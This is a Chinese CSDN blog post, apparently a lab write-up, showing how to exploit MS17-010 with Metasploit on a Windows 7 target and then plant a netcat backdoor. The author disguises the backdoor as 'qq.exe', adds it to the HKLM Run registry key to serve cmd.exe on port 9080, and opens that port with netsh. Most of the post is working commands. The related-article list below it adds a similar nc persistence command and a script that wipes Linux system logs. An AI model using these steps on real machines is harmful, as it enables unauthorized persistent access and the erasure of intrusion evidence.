nc后门

最新推荐文章于 2024-05-16 23:22:10 发布
最新推荐文章于 2024-05-16 23:22:10 发布
阅读量1.7k 收藏 3
点赞数
分类专栏: 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zgwz123456/article/details/115056634
版权

实验环境

靶 机:windows 7

攻击机:kali

漏洞利用:ms17-010

msfconsole
use exploit/windows/smb/ms17_010_eternalbule
set payload windows/x64/meterpreter/reverse_tcp
set rhosts 192.168.21.134
set lhost 192.168.21.130
set lport 6666
run

拿到权限后上传我们的nc后门程序(我把它改名成了qq)
在这里插入图片描述
查看启动项的键值项,查看有哪些启动项

reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run

在这里插入图片描述
在注册表启动项内添加我们的后门,-v 指定服务名称,-d指定程序路径,-Ldp指定反弹shell的端口,-e指定反弹的程序

reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v qq -d 'C:\windows\system32\qq.exe -Ldp 9080 -e cmd.exe'

在这里插入图片描述
查看我们感刚刚添加的启动项

reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v qq

重启靶机
kali,nc连接

nc 192.168.21.134 9080

在这里插入图片描述
直接拿到shell

这里我的防火墙是关闭的现在我们把防火墙开启试一下(在防火墙关闭的情况下先与靶机建立连接,如何在防火墙开启的情况下建立连接这个涉及本人知识盲区了)
连接的时候是这样一个情况
在这里插入图片描述
接下来我们需要

shell   #进入shell
netsh firewall show opmode #查看防火墙状态
netsh firewall add portopening TCP 9080 "qq" ENABLE ALL #把qq的9080端口开放

这样就可以在防火墙开着的情况下进行连接了

个人观点一般都是通过web上传拿到shell,然后用msf生成powershell上传,然后在设置端口的时候设置成常用的端口这样就不会被防火墙拦截了,在提权后关闭掉防火墙。

如果有大佬看见,希望可以对我指点下!!!

zgwz123456
关注
专栏目录
vbs nc 后门程序
11-30
在vbs横行的日子里我不在,在vbs不横行的时候 我小玩一下
Nc 建立后门.docx
06-04
### Nc(Netcat)建立后门详解 #### 一、引言 在网络安全领域,了解如何使用工具如Nc(Netcat)进行攻击与防御是至关重要的技能之一。Nc(Netcat)是一个功能强大的网络工具,它可以用于读取和写入网络连接的数据,...
kali linux权限维持,权限维持篇-NC后门
weixin_39829236的博客
04-29 449
今天一直在总结msf的命令,看到TRY大佬的NC后门,感觉不错,特来复现一下。前提拿到一个shell,并且还需要提权,以高权限进行后门利用,否则会失败。因为整个过程,需要操控注册表来完成。低权限的失败案例:后门安置上传NCKali中带有Windows下的NC。upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32解释一下为什么...
通过nc构造telnet后门
weixin_33939380的博客
03-24 248
nc被称为网络中的“瑞士军刀”,其功能强大,如果在肉鸡上运行“nc.exe –p port –L –d –e cmd.exe”命令就可以构建一个telnet后门,即使关闭了nc.exe程序运行窗口,该后门程序还继续存在。本案例通过一个bat文件来构建一个 telnet后门,当系统重新启动后,该后门会继续存在。当然nc还有许多其它用法:   (1)连接到REMOTE主机,格式:nc -nv...
黑客实战之攻击篇——用NC打造成自己的简单后门
cexosoft的专栏
01-30 9199
大家都知道nc是一个强大并且灵活的黑客工具,用他可以做很多事情,譬如做为telnet的客户端口,譬如入侵的时候反弹回来shell,譬如扫描……但是你有没有想过将他打造成一个服务级的后门呢?现在好多跟我一样的菜鸟还不懂得编程,别人写的流行点的后门又经常被杀,那就跟我一起来自己手工制作一个后门吧,不需要任何编程知识菜鸟级的东东哦。   首先请准备好不被杀的nc.exe(随便加个壳就可以了的),还有sc
复现|永恒之蓝,nc后门上传
最新发布
Maricopig的博客
05-16 815
须知:本次复现中均使用虚拟机环境,严禁对其他物理机进行渗透测试。lhost:Kali永恒之蓝漏洞[eternalblue][编号:ms17-010]漏洞利用案例:勒索病毒。
c++ cmdshell反弹型后门
07-01
反弹型后门 把自身注入到IE中 反向链接服务端 用NC 来监听就可以 大家可以发挥想象 把其他代码补全 (Rebound-type back door to reverse itself into the link into IE to listen with the NC server can imagine we...
NC 瑞士军刀,无后门,附源码!无毒
12-16
NC 瑞士军刀,无后门,附源码!无毒珍藏多年啊,伤不起。报毒是因为里面的代码,你懂得,不放心可以自己去检测,如果有后门,请狠狠地喷我!
Windows_NC木马后门攻击复现
shelter1234567的博客
06-09 1142
nc是一种常用的网络工具也被称为Netcat,它是一款TCP/IP连接工具,被誉为网络工具中的“瑞士军刀”。在渗透测试中,NC常被用来监听本地端口,等待主机的shell反弹连接。此外,它还可以用于文件传输、探测端口指纹,甚至可以用于聊天。由于NC是一种网络管理工具,因此在Windows系统中,它通常不会被杀毒软件误报或检测出病毒。本次我们利用nc的-e参数将远程windows计算机的cmd连接到本地主机的tcp端口实现后门控制的目的。声明:本次测试仅供网络安全学习者研究与学习使用,严禁将其用于任何违法行为。
永恒之蓝配合nc植入后门【笔记】
星落
12-15 549
永恒之蓝与nc的配合植入后门并反弹shell
Linux日志清理脚本
apple_54886810的博客
08-28 167
cat clog.sh #!/usr/bin/bash echo > /var/log/syslog echo > /var/log/messages echo > /var/log/httpd/access_log echo > /var/log/httpd/error_log echo > /var/log/xferlog echo > /var/log/secure echo > /var/log/auth.log echo > /var/log/use
【网络安全】内网渗透NC木马后门复现
一直被模仿,从未被超越
03-07 516
学习,请遵守相关法律法规,严禁用于非法途径。若读者因此作出任何危害网络安全的行为,后果自负,与作者无关。首先假设已经通过Kail成功入侵靶机。2、通过注册表设置开机启动。
nc——制作后门连接与反弹shell连接的使用
1stPeak's Blog
04-18 3760
一、nc参数 -g<网关> 设置路由器跃程通信网关,最多可设置8个 -G<指向器数目> 设置来源路由指向器,其数值为4的倍数 -h 在线帮助 -i<延迟秒数> 设置时间间隔,以便传送信息及扫描通信端口 -l 使用监听模式,管控传入的资料 -n 直接使用IP地址,而不通过域名服务器。 -o<输出文件> 指定文件名称,把往来传输的数据以16进制字码倾倒...
利用nc构建telnet后门控制案例
kf的专栏
02-03 795
nc俗称为网络中的“瑞士军刀”其功能强大,如果在肉鸡上运行“nc.exe –p port –L –d –e cmd.exe”命令就可以构建一个telnet后门,即使关闭了nc.exe程序运行窗口,该后门程序还继续存在。本案例通过一个bat文件来构建一个telnet后门,当系统重新启动后,该后门会继续存在。当然nc还有许多其它用法:   (1)连接到REMOTE主机,格式:nc -nvv 192.
通过meterpreter留nc后门
Yale的博客
01-27 1979
在靶机上安装一个netcat后门(包括修改系统注册表及防火墙) 首先我们需要上传我们的nc到靶机上 Uploaded表示上传成功(注:由于靶机是64位,所以自动上传到了syswow64路径下)   接下来我们需要修改注册表的键“HKLM\software\microsoft\windows\currentversion\run” 让nc在启动后执行并且在445端口监听  
Rsync 数据备份工具
88Manchi的博客
06-24 1941
1、Rsync简介 2、数据备份简介 2.1 数据备份方式 2.2 数据备份架构 3、Rsync本地模式和远程模式 3.1 安装Rsync工具 3.2 rsync命令选项 3.3 本地模式用法 3.4 远程模式用法 4、Rsync服务模式 4.1 服务端配置 4.2 客户端配置 5、Rsync服务模式实战...
Metasploit——后渗透测试阶段
m0_62063669的博客
08-14 2203
伪造一个AP,诱使别人来连这个AP,别人连了这个AP访问Internet上其他网站服务器的时候,因为流量经过这个AP,就可以在这个AP上嗅探抓包,因为有msf,可以在AP上启动一些漏洞利用模块,然后目标的流量经过AP,一旦发现目标浏览器有漏洞,通过流量分析可以判断浏览器版本是否有漏洞,尝试往流量里注入漏洞利用代码(插入到返回的流量中),一旦返回流量中 收到后有漏洞利用代码,恰好浏览器有对应漏洞,那么代码就会执行,创建新的meterpreter shell。所以设置为LHOST设置为win7的IP。.....
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值